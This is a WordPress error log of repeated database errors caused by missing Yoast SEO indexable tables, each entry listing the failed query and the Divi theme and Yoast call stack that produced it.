    [20-Nov-2020 21:01:39 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT * FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_id</code> = '1' AND <code>object_type</code> = 'user' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:39 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable_hierarchy' doesn't exist for query DELETE FROM <code>wp_tz3c246s0h_yoast_indexable_hierarchy</code> WHERE <code>indexable_id</code> = '0' made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Hierarchy_Builder->build, Yoast\WP\SEO\Repositories\Indexable_Hierarchy_Repository->clear_ancestors, Yoast\WP\Lib\ORM->delete_many, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:39 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query UPDATE <code>wp_tz3c246s0h_yoast_indexable</code> SET <code>has_public_posts</code> = '0', <code>permalink</code> = 'https://www.drumcafe.com/author/drumcafe/', <code>permalink_hash</code> = '41:cd80de8e2e6d3ce7e7ee2d7c9d9ebcaf', <code>updated_at</code> = '2020-11-20 21:01:39' WHERE <code>id</code> = '0' made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->updated_indexable, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->update_has_public_posts, Yoast\WP\SEO\Models\Indexable->save, Yoast\WP\Lib\Model->save, Yoast\WP\Lib\ORM->save, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:39 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT * FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_id</code> = '1' AND <code>object_type</code> = 'user' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:39 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT <code>id</code> FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_type</code> = 'post' AND <code>object_sub_type</code> = 'attachment' AND <code>post_status</code> = 'inherit' AND <code>post_parent</code> = '1336' AND <code>has_public_posts</code> IS NOT NULL made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->updated_indexable, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->update_has_public_posts, Yoast\WP\SEO\Helpers\Post_Helper->update_has_public_posts_on_attachments, Yoast\WP\Lib\ORM->find_array, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:39 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT <code>id</code> FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_type</code> = 'post' AND <code>object_sub_type</code> IN ('post') AND <code>author_id</code> = '1' AND <code>is_public</code> = '1' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Author_Builder->build, Yoast\WP\SEO\Helpers\Author_Archive_Helper->author_has_public_posts, Yoast\WP\SEO\Helpers\Author_Archive_Helper->author_has_a_public_post, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:39 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT <code>id</code> FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_type</code> = 'post' AND <code>object_sub_type</code> = 'attachment' AND <code>post_status</code> = 'inherit' AND <code>post_parent</code> = '1336' AND <code>has_public_posts</code> IS NOT NULL made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->updated_indexable, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->update_has_public_posts, Yoast\WP\SEO\Helpers\Post_Helper->update_has_public_posts_on_attachments, Yoast\WP\Lib\ORM->find_array, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:39 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query UPDATE <code>wp_tz3c246s0h_yoast_indexable</code> SET <code>permalink</code> = 'https://www.drumcafe.com/teambuilding/', <code>permalink_hash</code> = '38:e76a4385df09196c016725e6d51a113d', <code>updated_at</code> = '2020-11-20 21:01:39' WHERE <code>id</code> = '0' made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->updated_indexable, Yoast\WP\SEO\Models\Indexable->save, Yoast\WP\Lib\Model->save, Yoast\WP\Lib\ORM->save, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:39 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT <code>id</code> FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_type</code> = 'post' AND <code>object_sub_type</code> IN ('post') AND <code>author_id</code> = '1' AND <code>is_public</code> = '1' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Author_Builder->build, Yoast\WP\SEO\Helpers\Author_Archive_Helper->author_has_public_posts, Yoast\WP\SEO\Helpers\Author_Archive_Helper->author_has_a_public_post, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:39 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable_hierarchy' doesn't exist for query DELETE FROM <code>wp_tz3c246s0h_yoast_indexable_hierarchy</code> WHERE <code>indexable_id</code> = '0' made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Hierarchy_Builder->build, Yoast\WP\SEO\Repositories\Indexable_Hierarchy_Repository->clear_ancestors, Yoast\WP\Lib\ORM->delete_many, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:39 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT <code>id</code> FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_type</code> = 'post' AND <code>object_sub_type</code> IN ('post') AND <code>author_id</code> = '1' AND <code>is_public</code> IS NULL LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Author_Builder->build, Yoast\WP\SEO\Helpers\Author_Archive_Helper->author_has_public_posts, Yoast\WP\SEO\Helpers\Author_Archive_Helper->author_has_a_post_with_is_public_null, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:39 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT <code>id</code> FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_type</code> = 'post' AND <code>object_sub_type</code> IN ('post') AND <code>author_id</code> = '1' AND <code>is_public</code> IS NULL LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Author_Builder->build, Yoast\WP\SEO\Helpers\Author_Archive_Helper->author_has_public_posts, Yoast\WP\SEO\Helpers\Author_Archive_Helper->author_has_a_post_with_is_public_null, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:39 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query INSERT INTO <code>wp_tz3c246s0h_yoast_indexable</code> (<code>object_id</code>, <code>object_type</code>, <code>permalink</code>, <code>title</code>, <code>description</code>, <code>is_cornerstone</code>, <code>is_robots_noindex</code>, <code>is_robots_nofollow</code>, <code>is_robots_noarchive</code>, <code>is_robots_noimageindex</code>, <code>is_robots_nosnippet</code>, <code>is_public</code>, <code>has_public_posts</code>, <code>blog_id</code>, <code>open_graph_image</code>, <code>open_graph_image_id</code>, <code>open_graph_image_source</code>, <code>open_graph_image_meta</code>, <code>twitter_image</code>, <code>twitter_image_id</code>, <code>twitter_image_source</code>, <code>permalink_hash</code>, <code>created_at</code>, <code>updated_at</code>) VALUES ('1', 'user', 'https://www.drumcafe.com/author/drumcafe/', NULL, NULL, '0', '0', NULL, NULL, NULL, NULL, NULL, '0', '1', 'https://secure.gravatar.com/avatar/11fe64f45c58ca2662e3b7534d6aff86?s=500&d=mm&r=g', NULL, 'gravatar-image', NULL, 'https://secure.gravatar.com/avatar/11fe64f45c58ca2662e3b7534d6aff86?s=500&d=mm&r=g', NULL, 'gravatar-image', '41:cd80de8e2e6d3ce7e7ee2d7c9d9ebcaf', '2020-11-20 21:01:39', '2020-11-20 21:01:39') made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, Yoast\WP\SEO\Models\Indexable->save, Yoast\WP\Lib\Model->save, Yoast\WP\Lib\ORM->save, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:39 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query INSERT INTO <code>wp_tz3c246s0h_yoast_indexable</code> (<code>object_id</code>, <code>object_type</code>, <code>object_sub_type</code>, <code>permalink</code>, <code>primary_focus_keyword_score</code>, <code>readability_score</code>, <code>is_cornerstone</code>, <code>is_robots_noindex</code>, <code>is_robots_nofollow</code>, <code>is_robots_noimageindex</code>, <code>is_robots_noarchive</code>, <code>is_robots_nosnippet</code>, <code>open_graph_image</code>, <code>open_graph_image_id</code>, <code>open_graph_image_source</code>, <code>open_graph_image_meta</code>, <code>twitter_image</code>, <code>twitter_image_id</code>, <code>twitter_image_source</code>, <code>primary_focus_keyword</code>, <code>canonical</code>, <code>title</code>, <code>description</code>, <code>breadcrumb_title</code>, <code>open_graph_title</code>, <code>open_graph_description</code>, <code>twitter_title</code>, <code>twitter_description</code>, <code>author_id</code>, <code>post_parent</code>, <code>number_of_pages</code>, <code>post_status</code>, <code>is_protected</code>, <code>is_public</code>, <code>has_public_posts</code>, <code>blog_id</code>, <code>schema_page_type</code>, <code>schema_article_type</code>, <code>permalink_hash</code>, <code>created_at</code>, <code>updated_at</code>) VALUES ('1733', 'post', 'page', 'https://www.drumcafe.com/company-profile/', NULL, '30', '0', NULL, '0', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 'Company Profile', NULL, NULL, NULL, NULL, '1', '0', NULL, 'publish', '0', NULL, NULL, '1', NULL, NULL, '41:6d01cffacfc774104daceae91a0ab64e', '2020-11-20 21:01:39', '2020-11-20 21:01:39') made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, Yoast\WP\SEO\Models\Indexable->save, Yoast\WP\Lib\Model->save, Yoast\WP\Lib\ORM->save, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:39 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable_hierarchy' doesn't exist for query SELECT <code>indexable_id</code> FROM <code>wp_tz3c246s0h_yoast_indexable_hierarchy</code> WHERE <code>ancestor_id</code> = '0' made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Watchers\Indexable_Ancestor_Watcher->reset_children, Yoast\WP\SEO\Repositories\Indexable_Hierarchy_Repository->find_children, Yoast\WP\Lib\ORM->find_array, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:39 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable_hierarchy' doesn't exist for query SELECT <code>indexable_id</code> FROM <code>wp_tz3c246s0h_yoast_indexable_hierarchy</code> WHERE <code>ancestor_id</code> = '0' made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Watchers\Indexable_Ancestor_Watcher->reset_children, Yoast\WP\SEO\Repositories\Indexable_Hierarchy_Repository->find_children, Yoast\WP\Lib\ORM->find_array, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:39 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT * FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_id</code> = '1' AND <code>object_type</code> = 'user' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->updated_indexable, 